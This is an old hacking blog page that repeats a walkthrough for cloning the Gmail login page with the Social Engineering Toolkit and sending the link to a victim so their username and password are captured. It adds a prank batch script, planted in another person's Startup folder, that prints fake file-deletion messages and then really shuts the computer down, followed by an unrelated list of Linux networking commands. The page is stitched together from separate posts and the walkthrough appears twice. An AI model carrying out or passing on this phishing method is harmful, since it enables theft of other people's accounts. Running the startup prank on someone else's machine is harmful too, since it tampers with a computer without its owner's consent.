Wednesday 22 August 2012

HOW TO HACK GMAIL AND FACEBOOK WITH BACKTRACK 5


Welcome again to "HACKING begins - An approach to introduce people with the truth of HACKING".  This article is only for educational purpose don't misuse this information. 
Requirement 
Attracker :: Backtrack 5

Open Backtrack
Type ifconfig to check IP


Now Again Open Your Backtrack terminal and Type cd  /pentest/exploits/set
Now Open Social Engineering Toolkit (SET) ./set


Choose option 2, Website Attack Vectors


Choose option 4, Tabnabbing Attack Method”.


Choose option 2, "Site Cloner"


Enter the URL of the site you want to clone. In this case http://www.gmail.com and hit enter.


Now send your IP to victim and when victim open IP is browser a fake Gmail page start working and when user input Username and Password in fake page. The Username and Password displayed on SET.

 
Hope you like the tutorial ... 

Be a real hacker - PROFESSIONAL, and change the trend of HACKING.

HOW TO HACK GMAIL AND FACEBOOK WITH BACKTRACK 5


Welcome again to "HACKING begins - An approach to introduce people with the truth of HACKING".  This article is only for educational purpose don't misuse this information. 
Requirement 
Attracker :: Backtrack 5

Open Backtrack
Type ifconfig to check IP


Now Again Open Your Backtrack terminal and Type cd  /pentest/exploits/set
Now Open Social Engineering Toolkit (SET) ./set


Choose option 2, Website Attack Vectors


Choose option 4, Tabnabbing Attack Method”.


Choose option 2, "Site Cloner"


Enter the URL of the site you want to clone. In this case http://www.gmail.com and hit enter.


Now send your IP to victim and when victim open IP is browser a fake Gmail page start working and when user input Username and Password in fake page. The Username and Password displayed on SET.

 
Hope you like the tutorial ... 

Be a real hacker - PROFESSIONAL, and change the trend of HACKING.

Create 3 Simple Fake Viruses using Command Prompt and Visual Basic Read more: http://hackapc.blogspot.com/2009/07/create-3-simple-fake-viruses-using_06.html#ixzz24JBnQyCs

f you want to have some fun with your friends, drop these fake viruses into the folder located at "C:\Documents and Settings\All Users\Start Menu\Startup", then watch them squirm.

Although the following fake viruses may seem malicious to the unsuspecting, they are non-destructive to your computer system. So you don’t need to worry about anything else and just enjoy the fun of making someone else panic.

1. Fake Virus Batch File - I got this prank from WikiHow so credit goes to them. I love this fake virus because it looks the most like an actual attack. Copy and paste the following into Notepad, then save the file with any name you choose and an extension of ".bat"

Heres the Code 


cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep
echo Wscript.Sleep 5000>C:sleep5000.vbs
echo Wscript.Sleep 3000>C:sleep3000.vbs
echo Wscript.Sleep 4000>C:sleep4000.vbs
echo Wscript.Sleep 2000>C:sleep2000.vbs
cd %systemroot%System32
dir
cls
start /w wscript.exe C:sleep3000.vbs
echo Deleting Critical System Files…
echo del *.*
start /w wscript.exe C:sleep3000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Deleting Root Partition…
start /w wscript.exe C:sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x…
cd C:Documents and SettingsAll UsersStart MenuPrograms
mkdir h4x
start /w wscript.exe C:sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1…
start /w wscript.exe C:sleep3000.vbs
echo cd C:Documents and SettingsAll UsersStart MenuProgramsStartuph4x
echo start hax.exe
start /w wscript.exe C:sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:sleep2000.vbs
echo Disabling Windows Firewall…
start /w wscript.exe C:sleep2000.vbs
echo Killing all processes…
start /w wscript.exe C:sleep2000.vbs
echo Allowing virus to boot from startup…
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:sleep2000.vbs
pause
shutdown -s -t 10 -c "Your computer has committed suicide. Have a nice day pal."


And here is the screenshot



2. Fake Format - I remember getting my cousin once with a similar program. This cool fake virus perfectly simulates the Windows disk-format dialog, and cannot be closed or halted until it completes its course. Once it’s done, a message will be displayed informing the user that it was just a joke.



3. Fake Delete - This one is my favorite because, i love its formatting counterpart, Fake Delete mimics the Windows file-delete dialogs. It even goes as far as using your actual file list instead of generic filenames! This also has the "it-was-all-a-joke" screen after it’s done running.



Doesn't matter your friend click yes or no, fake delete will start deleting all the files.



When executing these pranks, please be considerate to whether your intended victim is mildly-panicky or really panicky, and whether your mark has some kind of panic disorder or heart problem. It’s all fun and games until someone goes to the hospital. Otherwise, have fun!

Read more: http://hackapc.blogspot.com/2009/07/create-3-simple-fake-viruses-using_06.html#ixzz24JC6E0Nx

LINUX NETWORKING COMMANDS ON BACKTRACK 5 LINUX NETWORKING COMMANDS


BACKTRACK 5 

Commands 
  1. PING COMMAND 
  2. ARP COMMAND 
  3. IFCONFIG COMMAND 
  4. PS COMMAND 
  5. NETSTAT COMMAND 
  6. ROUTE COMMAND 
  7. NSLOOKUP COMMAND 
  8. DIG COMMAND 
  9. TRACEROUTE COMMAND 


PING COMMAND
  • Ping command is used to test the IP  connectivity.
  • Syntax : Ping < ipaddress/domain name >
  • Example 1 : ping www.hackingdna.com
  • Example 2 : ping 209.85.175.121
  • See the below image for more details - 

EXAMPLE 1 : 

Ping Command

EXAMPLE 2 : 


ARP COMMAND 
  • Arp stands for Address Resolution Protocol 
  • Arp is used to  .find the MAC address of network neighbour for a given IPv4 Address.
  • Arp with no specifier will print the current content of the table .
  • Syntax : arp [ option ] 
  • Example : arp 
  • See the below image for more details - 
EXAMPLE "
Arp with no specifier 

IFCONFIG COMMAND 
  • Ifconfig command is used to view the network  configuration .
  • See the below image for more details - 

PS COMMAND 
  • Used to see all active processes.
  • Example : ps 



  NETSTAT COMMAND 



ROUTE 
  • Show / manipulate the ip routing table .
  • See below image for more details - 



NSLOOKUP COMMAND
  • NSlookup is a pogram to query internet domain name servers .
  • It can resolves name to IP addresses.
  • See the below image for more details - 


DIG COMMAND 
  • dig stand for domain information groper .
  • dig - is a DNS lookup utility . 
  • dig is a flexible tool for interrogating DNS name servers.
  • It performs DNS lookups  and  displays  the  answers that are returned from the name servers that were queried. 
  • Most DNS administrators use dig to troubleshoot DNS problems because of its flexibility, ease of use and clarity of output. 
  • Other lookup tools tend to have less functionality than dig.
  • See the below image for Example - 
dig command


TRACEROUTE COMMAND 
  • This command traces the path to a destination .
  • See the below image for more details -
Trace route command

  • This  is how we can use these LINUX NETWORKING COMMANDS on Backtrack 5  Linux 
  • If you have some query , drop here . 
  • You can also join Us on facebook 
  • OR
  • MORE INFORMATION  http://www.hackingdna.com/